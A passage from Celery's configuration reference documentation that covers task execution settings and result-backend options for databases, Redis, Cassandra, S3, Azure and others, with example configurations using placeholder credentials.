``CELERY_IGNORE_RESULT`` :setting:`task_ignore_result` ``CELERY_PUBLISH_RETRY`` :setting:`task_publish_retry` ``CELERY_PUBLISH_RETRY_POLICY`` :setting:`task_publish_retry_policy` ``CELERY_QUEUES`` :setting:`task_queues` ``CELERY_ROUTES`` :setting:`task_routes` ``CELERY_SEND_SENT_EVENT`` :setting:`task_send_sent_event` ``CELERY_SERIALIZER`` :setting:`task_serializer` ``CELERYD_SOFT_TIME_LIMIT`` :setting:`task_soft_time_limit` ``CELERY_TASK_TRACK_STARTED`` :setting:`task_track_started` ``CELERY_TASK_REJECT_ON_WORKER_LOST`` :setting:`task_reject_on_worker_lost` ``CELERYD_TIME_LIMIT`` :setting:`task_time_limit` ``CELERYD_AGENT`` :setting:`worker_agent` ``CELERYD_AUTOSCALER`` :setting:`worker_autoscaler` ``CELERYD_CONCURRENCY`` :setting:`worker_concurrency` ``CELERYD_CONSUMER`` :setting:`worker_consumer` ``CELERY_WORKER_DIRECT`` :setting:`worker_direct` ``CELERY_DISABLE_RATE_LIMITS`` :setting:`worker_disable_rate_limits` ``CELERY_ENABLE_REMOTE_CONTROL`` :setting:`worker_enable_remote_control` ``CELERYD_HIJACK_ROOT_LOGGER`` :setting:`worker_hijack_root_logger` ``CELERYD_LOG_COLOR`` :setting:`worker_log_color` ``CELERYD_LOG_FORMAT`` :setting:`worker_log_format` ``CELERYD_WORKER_LOST_WAIT`` :setting:`worker_lost_wait` ``CELERYD_MAX_TASKS_PER_CHILD`` :setting:`worker_max_tasks_per_child` ``CELERYD_POOL`` :setting:`worker_pool` ``CELERYD_POOL_PUTLOCKS`` :setting:`worker_pool_putlocks` ``CELERYD_POOL_RESTARTS`` :setting:`worker_pool_restarts` ``CELERYD_PREFETCH_MULTIPLIER`` :setting:`worker_prefetch_multiplier` ``CELERYD_REDIRECT_STDOUTS`` :setting:`worker_redirect_stdouts` ``CELERYD_REDIRECT_STDOUTS_LEVEL`` :setting:`worker_redirect_stdouts_level` ``CELERY_SEND_EVENTS`` :setting:`worker_send_task_events` ``CELERYD_STATE_DB`` :setting:`worker_state_db` ``CELERYD_TASK_LOG_FORMAT`` :setting:`worker_task_log_format` ``CELERYD_TIMER`` :setting:`worker_timer` ``CELERYD_TIMER_PRECISION`` :setting:`worker_timer_precision` ========================================== ============================================== Configuration Directives ======================== .. _conf-datetime: General settings ---------------- .. setting:: accept_content ``accept_content`` ~~~~~~~~~~~~~~~~~~ Default: ``{'json'}`` (set, list, or tuple). A white-list of content-types/serializers to allow. If a message is received that's not in this list then the message will be discarded with an error. By default only json is enabled but any content type can be added, including pickle and yaml; when this is the case make sure untrusted parties don't have access to your broker. See :ref:`guide-security` for more. Example:: # using serializer name accept_content = ['json'] # or the actual content-type (MIME) accept_content = ['application/json'] .. setting:: result_accept_content ``result_accept_content`` ~~~~~~~~~~~~~~~~~~~~~~~~~ Default: ``None`` (can be set, list or tuple). .. versionadded:: 4.3 A white-list of content-types/serializers to allow for the result backend. If a message is received that's not in this list then the message will be discarded with an error. By default it is the same serializer as ``accept_content``. However, a different serializer for accepted content of the result backend can be specified. Usually this is needed if signed messaging is used and the result is stored unsigned in the result backend. See :ref:`guide-security` for more. Example:: # using serializer name result_accept_content = ['json'] # or the actual content-type (MIME) result_accept_content = ['application/json'] Time and date settings ---------------------- .. setting:: enable_utc ``enable_utc`` ~~~~~~~~~~~~~~ .. versionadded:: 2.5 Default: Enabled by default since version 3.0. If enabled dates and times in messages will be converted to use the UTC timezone. Note that workers running Celery versions below 2.5 will assume a local timezone for all messages, so only enable if all workers have been upgraded. .. setting:: timezone ``timezone`` ~~~~~~~~~~~~ .. versionadded:: 2.5 Default: ``"UTC"``. Configure Celery to use a custom time zone. The timezone value can be any time zone supported by the :pypi:`pytz` library. If not set the UTC timezone is used. For backwards compatibility there's also a :setting:`enable_utc` setting, and when this is set to false the system local timezone is used instead. .. _conf-tasks: Task settings ------------- .. setting:: task_annotations ``task_annotations`` ~~~~~~~~~~~~~~~~~~~~ .. versionadded:: 2.5 Default: :const:`None`. This setting can be used to rewrite any task attribute from the configuration. The setting can be a dict, or a list of annotation objects that filter for tasks and return a map of attributes to change. This will change the ``rate_limit`` attribute for the ``tasks.add`` task: .. code-block:: python task_annotations = {'tasks.add': {'rate_limit': '10/s'}} or change the same for all tasks: .. code-block:: python task_annotations = {'*': {'rate_limit': '10/s'}} You can change methods too, for example the ``on_failure`` handler: .. code-block:: python def my_on_failure(self, exc, task_id, args, kwargs, einfo): print('Oh no! Task failed: {0!r}'.format(exc)) task_annotations = {'*': {'on_failure': my_on_failure}} If you need more flexibility then you can use objects instead of a dict to choose the tasks to annotate: .. code-block:: python class MyAnnotate: def annotate(self, task): if task.name.startswith('tasks.'): return {'rate_limit': '10/s'} task_annotations = (MyAnnotate(), {other,}) .. setting:: task_compression ``task_compression`` ~~~~~~~~~~~~~~~~~~~~ Default: :const:`None` Default compression used for task messages. Can be ``gzip``, ``bzip2`` (if available), or any custom compression schemes registered in the Kombu compression registry. The default is to send uncompressed messages. .. setting:: task_protocol ``task_protocol`` ~~~~~~~~~~~~~~~~~ .. versionadded: 4.0 Default: 2 (since 4.0). Set the default task message protocol version used to send tasks. Supports protocols: 1 and 2. Protocol 2 is supported by 3.1.24 and 4.x+. .. setting:: task_serializer ``task_serializer`` ~~~~~~~~~~~~~~~~~~~ Default: ``"json"`` (since 4.0, earlier: pickle). A string identifying the default serialization method to use. Can be `json` (default), `pickle`, `yaml`, `msgpack`, or any custom serialization methods that have been registered with :mod:`kombu.serialization.registry`. .. seealso:: :ref:`calling-serializers`. .. setting:: task_publish_retry ``task_publish_retry`` ~~~~~~~~~~~~~~~~~~~~~~ .. versionadded:: 2.2 Default: Enabled. Decides if publishing task messages will be retried in the case of connection loss or other connection errors. See also :setting:`task_publish_retry_policy`. .. setting:: task_publish_retry_policy ``task_publish_retry_policy`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .. versionadded:: 2.2 Default: See :ref:`calling-retry`. Defines the default policy when retrying publishing a task message in the case of connection loss or other connection errors. .. _conf-task-execution: Task execution settings ----------------------- .. setting:: task_always_eager ``task_always_eager`` ~~~~~~~~~~~~~~~~~~~~~ Default: Disabled. If this is :const:`True`, all tasks will be executed locally by blocking until the task returns. ``apply_async()`` and ``Task.delay()`` will return an :class:`~celery.result.EagerResult` instance, that emulates the API and behavior of :class:`~celery.result.AsyncResult`, except the result is already evaluated. That is, tasks will be executed locally instead of being sent to the queue. .. setting:: task_eager_propagates ``task_eager_propagates`` ~~~~~~~~~~~~~~~~~~~~~~~~~ Default: Disabled. If this is :const:`True`, eagerly executed tasks (applied by `task.apply()`, or when the :setting:`task_always_eager` setting is enabled), will propagate exceptions. It's the same as always running ``apply()`` with ``throw=True``. .. setting:: task_store_eager_result ``task_store_eager_result`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~ .. versionadded:: 5.1 Default: Disabled. If this is :const:`True` and :setting:`task_always_eager` is :const:`True` and :setting:`task_ignore_result` is :const:`False`, the results of eagerly executed tasks will be saved to the backend. By default, even with :setting:`task_always_eager` set to :const:`True` and :setting:`task_ignore_result` set to :const:`False`, the result will not be saved. .. setting:: task_remote_tracebacks ``task_remote_tracebacks`` ~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: Disabled. If enabled task results will include the workers stack when re-raising task errors. This requires the :pypi:`tblib` library, that can be installed using :command:`pip`: .. code-block:: console $ pip install celery[tblib] See :ref:`bundles` for information on combining multiple extension requirements. .. setting:: task_ignore_result ``task_ignore_result`` ~~~~~~~~~~~~~~~~~~~~~~ Default: Disabled. Whether to store the task return values or not (tombstones). If you still want to store errors, just not successful return values, you can set :setting:`task_store_errors_even_if_ignored`. .. setting:: task_store_errors_even_if_ignored ``task_store_errors_even_if_ignored`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: Disabled. If set, the worker stores all task errors in the result store even if :attr:`Task.ignore_result ` is on. .. setting:: task_track_started ``task_track_started`` ~~~~~~~~~~~~~~~~~~~~~~ Default: Disabled. If :const:`True` the task will report its status as 'started' when the task is executed by a worker. The default value is :const:`False` as the normal behavior is to not report that level of granularity. Tasks are either pending, finished, or waiting to be retried. Having a 'started' state can be useful for when there are long running tasks and there's a need to report what task is currently running. .. setting:: task_time_limit ``task_time_limit`` ~~~~~~~~~~~~~~~~~~~ Default: No time limit. Task hard time limit in seconds. The worker processing the task will be killed and replaced with a new one when this is exceeded. .. setting:: task_soft_time_limit ``task_soft_time_limit`` ~~~~~~~~~~~~~~~~~~~~~~~~ Default: No soft time limit. Task soft time limit in seconds. The :exc:`~@SoftTimeLimitExceeded` exception will be raised when this is exceeded. For example, the task can catch this to clean up before the hard time limit comes: .. code-block:: python from celery.exceptions import SoftTimeLimitExceeded @app.task def mytask(): try: return do_work() except SoftTimeLimitExceeded: cleanup_in_a_hurry() .. setting:: task_acks_late ``task_acks_late`` ~~~~~~~~~~~~~~~~~~ Default: Disabled. Late ack means the task messages will be acknowledged **after** the task has been executed, not *just before* (the default behavior). .. seealso:: FAQ: :ref:`faq-acks_late-vs-retry`. .. setting:: task_acks_on_failure_or_timeout ``task_acks_on_failure_or_timeout`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: Enabled When enabled messages for all tasks will be acknowledged even if they fail or time out. Configuring this setting only applies to tasks that are acknowledged **after** they have been executed and only if :setting:`task_acks_late` is enabled. .. setting:: task_reject_on_worker_lost ``task_reject_on_worker_lost`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: Disabled. Even if :setting:`task_acks_late` is enabled, the worker will acknowledge tasks when the worker process executing them abruptly exits or is signaled (e.g., :sig:`KILL`/:sig:`INT`, etc). Setting this to true allows the message to be re-queued instead, so that the task will execute again by the same worker, or another worker. .. warning:: Enabling this can cause message loops; make sure you know what you're doing. .. setting:: task_default_rate_limit ``task_default_rate_limit`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: No rate limit. The global default rate limit for tasks. This value is used for tasks that doesn't have a custom rate limit .. seealso:: The setting:`worker_disable_rate_limits` setting can disable all rate limits. .. _conf-result-backend: Task result backend settings ---------------------------- .. setting:: result_backend ``result_backend`` ~~~~~~~~~~~~~~~~~~ Default: No result backend enabled by default. The backend used to store task results (tombstones). Can be one of the following: * ``rpc`` Send results back as AMQP messages See :ref:`conf-rpc-result-backend`. * ``database`` Use a relational database supported by `SQLAlchemy`_. See :ref:`conf-database-result-backend`. * ``redis`` Use `Redis`_ to store the results. See :ref:`conf-redis-result-backend`. * ``cache`` Use `Memcached`_ to store the results. See :ref:`conf-cache-result-backend`. * mongodb Use `MongoDB`_ to store the results. See :ref:`conf-mongodb-result-backend`. * ``cassandra`` Use `Cassandra`_ to store the results. See :ref:`conf-cassandra-result-backend`. * ``elasticsearch`` Use `Elasticsearch`_ to store the results. See :ref:`conf-elasticsearch-result-backend`. * ``ironcache`` Use `IronCache`_ to store the results. See :ref:`conf-ironcache-result-backend`. * ``couchbase`` Use `Couchbase`_ to store the results. See :ref:`conf-couchbase-result-backend`. * ``arangodb`` Use `ArangoDB`_ to store the results. See :ref:`conf-arangodb-result-backend`. * ``couchdb`` Use `CouchDB`_ to store the results. See :ref:`conf-couchdb-result-backend`. * ``cosmosdbsql (experimental)`` Use the `CosmosDB`_ PaaS to store the results. See :ref:`conf-cosmosdbsql-result-backend`. * ``filesystem`` Use a shared directory to store the results. See :ref:`conf-filesystem-result-backend`. * ``consul`` Use the `Consul`_ K/V store to store the results See :ref:`conf-consul-result-backend`. * ``azureblockblob`` Use the `AzureBlockBlob`_ PaaS store to store the results See :ref:`conf-azureblockblob-result-backend`. * ``s3`` Use the `S3`_ to store the results See :ref:`conf-s3-result-backend`. .. warning: While the AMQP result backend is very efficient, you must make sure you only receive the same result once. See :doc:`userguide/calling`). .. _`SQLAlchemy`: http://sqlalchemy.org .. _`Memcached`: http://memcached.org .. _`MongoDB`: http://mongodb.org .. _`Redis`: https://redis.io .. _`Cassandra`: http://cassandra.apache.org/ .. _`Elasticsearch`: https://aws.amazon.com/elasticsearch-service/ .. _`IronCache`: http://www.iron.io/cache .. _`CouchDB`: http://www.couchdb.com/ .. _`CosmosDB`: https://azure.microsoft.com/en-us/services/cosmos-db/ .. _`Couchbase`: https://www.couchbase.com/ .. _`ArangoDB`: https://www.arangodb.com/ .. _`Consul`: https://consul.io/ .. _`AzureBlockBlob`: https://azure.microsoft.com/en-us/services/storage/blobs/ .. _`S3`: https://aws.amazon.com/s3/ .. setting:: result_backend_always_retry ``result_backend_always_retry`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: :const:`False` If enable, backend will try to retry on the event of recoverable exceptions instead of propagating the exception. It will use an exponential backoff sleep time between 2 retries. .. setting:: result_backend_max_sleep_between_retries_ms ``result_backend_max_sleep_between_retries_ms`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: 10000 This specifies the maximum sleep time between two backend operation retry. .. setting:: result_backend_base_sleep_between_retries_ms ``result_backend_base_sleep_between_retries_ms`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: 10 This specifies the base amount of sleep time between two backend operation retry. .. setting:: result_backend_max_retries ``result_backend_max_retries`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: Inf This is the maximum of retries in case of recoverable exceptions. .. setting:: result_backend_transport_options ``result_backend_transport_options`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: ``{}`` (empty mapping). A dict of additional options passed to the underlying transport. See your transport user manual for supported options (if any). Example setting the visibility timeout (supported by Redis and SQS transports): .. code-block:: python result_backend_transport_options = {'visibility_timeout': 18000} # 5 hours .. setting:: result_serializer ``result_serializer`` ~~~~~~~~~~~~~~~~~~~~~ Default: ``json`` since 4.0 (earlier: pickle). Result serialization format. See :ref:`calling-serializers` for information about supported serialization formats. .. setting:: result_compression ``result_compression`` ~~~~~~~~~~~~~~~~~~~~~~ Default: No compression. Optional compression method used for task results. Supports the same options as the :setting:`task_compression` setting. .. setting:: result_extended ``result_extended`` ~~~~~~~~~~~~~~~~~~~~~~ Default: ``False`` Enables extended task result attributes (name, args, kwargs, worker, retries, queue, delivery_info) to be written to backend. .. setting:: result_expires ``result_expires`` ~~~~~~~~~~~~~~~~~~ Default: Expire after 1 day. Time (in seconds, or a :class:`~datetime.timedelta` object) for when after stored task tombstones will be deleted. A built-in periodic task will delete the results after this time (``celery.backend_cleanup``), assuming that ``celery beat`` is enabled. The task runs daily at 4am. A value of :const:`None` or 0 means results will never expire (depending on backend specifications). .. note:: For the moment this only works with the AMQP, database, cache, Couchbase, and Redis backends. When using the database backend, ``celery beat`` must be running for the results to be expired. .. setting:: result_cache_max ``result_cache_max`` ~~~~~~~~~~~~~~~~~~~~ Default: Disabled by default. Enables client caching of results. This can be useful for the old deprecated 'amqp' backend where the result is unavailable as soon as one result instance consumes it. This is the total number of results to cache before older results are evicted. A value of 0 or None means no limit, and a value of :const:`-1` will disable the cache. Disabled by default. .. setting:: result_chord_join_timeout ``result_chord_join_timeout`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: 3.0. The timeout in seconds (int/float) when joining a group's results within a chord. .. setting:: result_chord_retry_interval ``result_chord_retry_interval`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: 1.0. Default interval for retrying chord tasks. .. _conf-database-result-backend: .. setting:: override_backends ``override_backends`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: Disabled by default. Path to class that implements backend. Allows to override backend implementation. This can be useful if you need to store additional metadata about executed tasks, override retry policies, etc. Example: .. code-block:: python override_backends = {"db": "custom_module.backend.class"} Database backend settings ------------------------- Database URL Examples ~~~~~~~~~~~~~~~~~~~~~ To use the database backend you have to configure the :setting:`result_backend` setting with a connection URL and the ``db+`` prefix: .. code-block:: python result_backend = 'db+scheme://user:password@host:port/dbname' Examples:: # sqlite (filename) result_backend = 'db+sqlite:///results.sqlite' # mysql result_backend = 'db+mysql://scott:tiger@localhost/foo' # postgresql result_backend = 'db+postgresql://scott:tiger@localhost/mydatabase' # oracle result_backend = 'db+oracle://scott:tiger@127.0.0.1:1521/sidname' .. code-block:: python Please see `Supported Databases`_ for a table of supported databases, and `Connection String`_ for more information about connection strings (this is the part of the URI that comes after the ``db+`` prefix). .. _`Supported Databases`: http://www.sqlalchemy.org/docs/core/engines.html#supported-databases .. _`Connection String`: http://www.sqlalchemy.org/docs/core/engines.html#database-urls .. setting:: database_engine_options ``database_engine_options`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: ``{}`` (empty mapping). To specify additional SQLAlchemy database engine options you can use the :setting:`database_engine_options` setting:: # echo enables verbose logging from SQLAlchemy. app.conf.database_engine_options = {'echo': True} .. setting:: database_short_lived_sessions ``database_short_lived_sessions`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: Disabled by default. Short lived sessions are disabled by default. If enabled they can drastically reduce performance, especially on systems processing lots of tasks. This option is useful on low-traffic workers that experience errors as a result of cached database connections going stale through inactivity. For example, intermittent errors like `(OperationalError) (2006, 'MySQL server has gone away')` can be fixed by enabling short lived sessions. This option only affects the database backend. .. setting:: database_table_schemas ``database_table_schemas`` ~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: ``{}`` (empty mapping). When SQLAlchemy is configured as the result backend, Celery automatically creates two tables to store result meta-data for tasks. This setting allows you to customize the schema of the tables: .. code-block:: python # use custom schema for the database result backend. database_table_schemas = { 'task': 'celery', 'group': 'celery', } .. setting:: database_table_names ``database_table_names`` ~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: ``{}`` (empty mapping). When SQLAlchemy is configured as the result backend, Celery automatically creates two tables to store result meta-data for tasks. This setting allows you to customize the table names: .. code-block:: python # use custom table names for the database result backend. database_table_names = { 'task': 'myapp_taskmeta', 'group': 'myapp_groupmeta', } .. _conf-rpc-result-backend: RPC backend settings -------------------- .. setting:: result_persistent ``result_persistent`` ~~~~~~~~~~~~~~~~~~~~~ Default: Disabled by default (transient messages). If set to :const:`True`, result messages will be persistent. This means the messages won't be lost after a broker restart. Example configuration ~~~~~~~~~~~~~~~~~~~~~ .. code-block:: python result_backend = 'rpc://' result_persistent = False **Please note**: using this backend could trigger the raise of ``celery.backends.rpc.BacklogLimitExceeded`` if the task tombstone is too *old*. E.g. .. code-block:: python for i in range(10000): r = debug_task.delay() print(r.state) # this would raise celery.backends.rpc.BacklogLimitExceeded .. _conf-cache-result-backend: Cache backend settings ---------------------- .. note:: The cache backend supports the :pypi:`pylibmc` and :pypi:`python-memcached` libraries. The latter is used only if :pypi:`pylibmc` isn't installed. Using a single Memcached server: .. code-block:: python result_backend = 'cache+memcached://127.0.0.1:11211/' Using multiple Memcached servers: .. code-block:: python result_backend = """ cache+memcached://172.19.26.240:11211;172.19.26.242:11211/ """.strip() The "memory" backend stores the cache in memory only: .. code-block:: python result_backend = 'cache' cache_backend = 'memory' .. setting:: cache_backend_options ``cache_backend_options`` ~~~~~~~~~~~~~~~~~~~~~~~~~ Default: ``{}`` (empty mapping). You can set :pypi:`pylibmc` options using the :setting:`cache_backend_options` setting: .. code-block:: python cache_backend_options = { 'binary': True, 'behaviors': {'tcp_nodelay': True}, } .. setting:: cache_backend ``cache_backend`` ~~~~~~~~~~~~~~~~~ This setting is no longer used in celery's builtin backends as it's now possible to specify the cache backend directly in the :setting:`result_backend` setting. .. note:: The :ref:`django-celery-results` library uses ``cache_backend`` for choosing django caches. .. _conf-mongodb-result-backend: MongoDB backend settings ------------------------ .. note:: The MongoDB backend requires the :mod:`pymongo` library: http://github.com/mongodb/mongo-python-driver/tree/master .. setting:: mongodb_backend_settings mongodb_backend_settings ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This is a dict supporting the following keys: * database The database name to connect to. Defaults to ``celery``. * taskmeta_collection The collection name to store task meta data. Defaults to ``celery_taskmeta``. * max_pool_size Passed as max_pool_size to PyMongo's Connection or MongoClient constructor. It is the maximum number of TCP connections to keep open to MongoDB at a given time. If there are more open connections than max_pool_size, sockets will be closed when they are released. Defaults to 10. * options Additional keyword arguments to pass to the mongodb connection constructor. See the :mod:`pymongo` docs to see a list of arguments supported. .. _example-mongodb-result-config: Example configuration ~~~~~~~~~~~~~~~~~~~~~ .. code-block:: python result_backend = 'mongodb://localhost:27017/' mongodb_backend_settings = { 'database': 'mydb', 'taskmeta_collection': 'my_taskmeta_collection', } .. _conf-redis-result-backend: Redis backend settings ---------------------- Configuring the backend URL ~~~~~~~~~~~~~~~~~~~~~~~~~~~ .. note:: The Redis backend requires the :pypi:`redis` library. To install this package use :command:`pip`: .. code-block:: console $ pip install celery[redis] See :ref:`bundles` for information on combining multiple extension requirements. This backend requires the :setting:`result_backend` setting to be set to a Redis or `Redis over TLS`_ URL:: result_backend = 'redis://username:password@host:port/db' .. _`Redis over TLS`: https://www.iana.org/assignments/uri-schemes/prov/rediss For example:: result_backend = 'redis://localhost/0' is the same as:: result_backend = 'redis://' Use the ``rediss://`` protocol to connect to redis over TLS:: result_backend = 'rediss://username:password@host:port/db?ssl_cert_reqs=required' Note that the ``ssl_cert_reqs`` string should be one of ``required``, ``optional``, or ``none`` (though, for backwards compatibility, the string may also be one of ``CERT_REQUIRED``, ``CERT_OPTIONAL``, ``CERT_NONE``). If a Unix socket connection should be used, the URL needs to be in the format::: result_backend = 'socket:///path/to/redis.sock' The fields of the URL are defined as follows: #. ``username`` .. versionadded:: 5.1.0 Username used to connect to the database. Note that this is only supported in Redis>=6.0 and with py-redis>=3.4.0 installed. If you use an older database version or an older client version you can omit the username:: result_backend = 'redis://:password@host:port/db' #. ``password`` Password used to connect to the database. #. ``host`` Host name or IP address of the Redis server (e.g., `localhost`). #. ``port`` Port to the Redis server. Default is 6379. #. ``db`` Database number to use. Default is 0. The db can include an optional leading slash. When using a TLS connection (protocol is ``rediss://``), you may pass in all values in :setting:`broker_use_ssl` as query parameters. Paths to certificates must be URL encoded, and ``ssl_cert_reqs`` is required. Example: .. code-block:: python result_backend = 'rediss://:password@host:port/db?\ ssl_cert_reqs=required\ &ssl_ca_certs=%2Fvar%2Fssl%2Fmyca.pem\ # /var/ssl/myca.pem &ssl_certfile=%2Fvar%2Fssl%2Fredis-server-cert.pem\ # /var/ssl/redis-server-cert.pem &ssl_keyfile=%2Fvar%2Fssl%2Fprivate%2Fworker-key.pem' # /var/ssl/private/worker-key.pem Note that the ``ssl_cert_reqs`` string should be one of ``required``, ``optional``, or ``none`` (though, for backwards compatibility, the string may also be one of ``CERT_REQUIRED``, ``CERT_OPTIONAL``, ``CERT_NONE``). .. setting:: redis_backend_health_check_interval .. versionadded:: 5.1.0 ``redis_backend_health_check_interval`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: Not configured The Redis backend supports health checks. This value must be set as an integer whose value is the number of seconds between health checks. If a ConnectionError or a TimeoutError is encountered during the health check, the connection will be re-established and the command retried exactly once. .. setting:: redis_backend_use_ssl ``redis_backend_use_ssl`` ~~~~~~~~~~~~~~~~~~~~~~~~~ Default: Disabled. The Redis backend supports SSL. This value must be set in the form of a dictionary. The valid key-value pairs are the same as the ones mentioned in the ``redis`` sub-section under :setting:`broker_use_ssl`. .. setting:: redis_max_connections ``redis_max_connections`` ~~~~~~~~~~~~~~~~~~~~~~~~~ Default: No limit. Maximum number of connections available in the Redis connection pool used for sending and retrieving results. .. warning:: Redis will raise a `ConnectionError` if the number of concurrent connections exceeds the maximum. .. setting:: redis_socket_connect_timeout ``redis_socket_connect_timeout`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .. versionadded:: 4.0.1 Default: :const:`None` Socket timeout for connections to Redis from the result backend in seconds (int/float) .. setting:: redis_socket_timeout ``redis_socket_timeout`` ~~~~~~~~~~~~~~~~~~~~~~~~ Default: 120.0 seconds. Socket timeout for reading/writing operations to the Redis server in seconds (int/float), used by the redis result backend. .. setting:: redis_retry_on_timeout ``redis_retry_on_timeout`` ~~~~~~~~~~~~~~~~~~~~~~~~~~ .. versionadded:: 4.4.1 Default: :const:`False` To retry reading/writing operations on TimeoutError to the Redis server, used by the redis result backend. Shouldn't set this variable if using Redis connection by unix socket. .. setting:: redis_socket_keepalive ``redis_socket_keepalive`` ~~~~~~~~~~~~~~~~~~~~~~~~~~ .. versionadded:: 4.4.1 Default: :const:`False` Socket TCP keepalive to keep connections healthy to the Redis server, used by the redis result backend. .. _conf-cassandra-result-backend: Cassandra backend settings -------------------------- .. note:: This Cassandra backend driver requires :pypi:`cassandra-driver`. To install, use :command:`pip`: .. code-block:: console $ pip install celery[cassandra] See :ref:`bundles` for information on combining multiple extension requirements. This backend requires the following configuration directives to be set. .. setting:: cassandra_servers ``cassandra_servers`` ~~~~~~~~~~~~~~~~~~~~~ Default: ``[]`` (empty list). List of ``host`` Cassandra servers. For example:: cassandra_servers = ['localhost'] .. setting:: cassandra_port ``cassandra_port`` ~~~~~~~~~~~~~~~~~~ Default: 9042. Port to contact the Cassandra servers on. .. setting:: cassandra_keyspace ``cassandra_keyspace`` ~~~~~~~~~~~~~~~~~~~~~~ Default: None. The key-space in which to store the results. For example:: cassandra_keyspace = 'tasks_keyspace' .. setting:: cassandra_table ``cassandra_table`` ~~~~~~~~~~~~~~~~~~~ Default: None. The table (column family) in which to store the results. For example:: cassandra_table = 'tasks' .. setting:: cassandra_read_consistency ``cassandra_read_consistency`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: None. The read consistency used. Values can be ``ONE``, ``TWO``, ``THREE``, ``QUORUM``, ``ALL``, ``LOCAL_QUORUM``, ``EACH_QUORUM``, ``LOCAL_ONE``. .. setting:: cassandra_write_consistency ``cassandra_write_consistency`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: None. The write consistency used. Values can be ``ONE``, ``TWO``, ``THREE``, ``QUORUM``, ``ALL``, ``LOCAL_QUORUM``, ``EACH_QUORUM``, ``LOCAL_ONE``. .. setting:: cassandra_entry_ttl ``cassandra_entry_ttl`` ~~~~~~~~~~~~~~~~~~~~~~~ Default: None. Time-to-live for status entries. They will expire and be removed after that many seconds after adding. A value of :const:`None` (default) means they will never expire. .. setting:: cassandra_auth_provider ``cassandra_auth_provider`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: :const:`None`. AuthProvider class within ``cassandra.auth`` module to use. Values can be ``PlainTextAuthProvider`` or ``SaslAuthProvider``. .. setting:: cassandra_auth_kwargs ``cassandra_auth_kwargs`` ~~~~~~~~~~~~~~~~~~~~~~~~~ Default: ``{}`` (empty mapping). Named arguments to pass into the authentication provider. For example: .. code-block:: python cassandra_auth_kwargs = { username: 'cassandra', password: 'cassandra' } .. setting:: cassandra_options ``cassandra_options`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: ``{}`` (empty mapping). Named arguments to pass into the ``cassandra.cluster`` class. .. code-block:: python cassandra_options = { 'cql_version': '3.2.1' 'protocol_version': 3 } Example configuration ~~~~~~~~~~~~~~~~~~~~~ .. code-block:: python cassandra_servers = ['localhost'] cassandra_keyspace = 'celery' cassandra_table = 'tasks' cassandra_read_consistency = 'ONE' cassandra_write_consistency = 'ONE' cassandra_entry_ttl = 86400 .. _conf-s3-result-backend: S3 backend settings ------------------- .. note:: This s3 backend driver requires :pypi:`s3`. To install, use :command:`s3`: .. code-block:: console $ pip install celery[s3] See :ref:`bundles` for information on combining multiple extension requirements. This backend requires the following configuration directives to be set. .. setting:: s3_access_key_id ``s3_access_key_id`` ~~~~~~~~~~~~~~~~~~~~ Default: None. The s3 access key id. For example:: s3_access_key_id = 'acces_key_id' .. setting:: s3_secret_access_key ``s3_secret_access_key`` ~~~~~~~~~~~~~~~~~~~~~~~~ Default: None. The s3 secret access key. For example:: s3_secret_access_key = 'acces_secret_access_key' .. setting:: s3_bucket ``s3_bucket`` ~~~~~~~~~~~~~ Default: None. The s3 bucket name. For example:: s3_bucket = 'bucket_name' .. setting:: s3_base_path ``s3_base_path`` ~~~~~~~~~~~~~~~~ Default: None. A base path in the s3 bucket to use to store result keys. For example:: s3_base_path = '/prefix' .. setting:: s3_endpoint_url ``s3_endpoint_url`` ~~~~~~~~~~~~~~~~~~~ Default: None. A custom s3 endpoint url. Use it to connect to a custom self-hosted s3 compatible backend (Ceph, Scality...). For example:: s3_endpoint_url = 'https://.s3.custom.url' .. setting:: s3_region ``s3_region`` ~~~~~~~~~~~~~ Default: None. The s3 aws region. For example:: s3_region = 'us-east-1' Example configuration ~~~~~~~~~~~~~~~~~~~~~ .. code-block:: python s3_access_key_id = 's3-access-key-id' s3_secret_access_key = 's3-secret-access-key' s3_bucket = 'mybucket' s3_base_path = '/celery_result_backend' s3_endpoint_url = 'https://endpoint_url' .. _conf-azureblockblob-result-backend: Azure Block Blob backend settings --------------------------------- To use `AzureBlockBlob`_ as the result backend you simply need to configure the :setting:`result_backend` setting with the correct URL. The required URL format is ``azureblockblob://`` followed by the storage connection string. You can find the storage connection string in the ``Access Keys`` pane of your storage account resource in the Azure Portal. Example configuration ~~~~~~~~~~~~~~~~~~~~~ .. code-block:: python result_backend = 'azureblockblob://DefaultEndpointsProtocol=https;AccountName=somename;AccountKey=Lou...bzg==;EndpointSuffix=core.windows.net' .. setting:: azureblockblob_container_name ``azureblockblob_container_name`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: celery. The name for the storage container in which to store the results. .. setting:: azureblockblob_base_path ``azureblockblob_base_path`` ~~~~~~~~~~~~~~~~~~~ .. 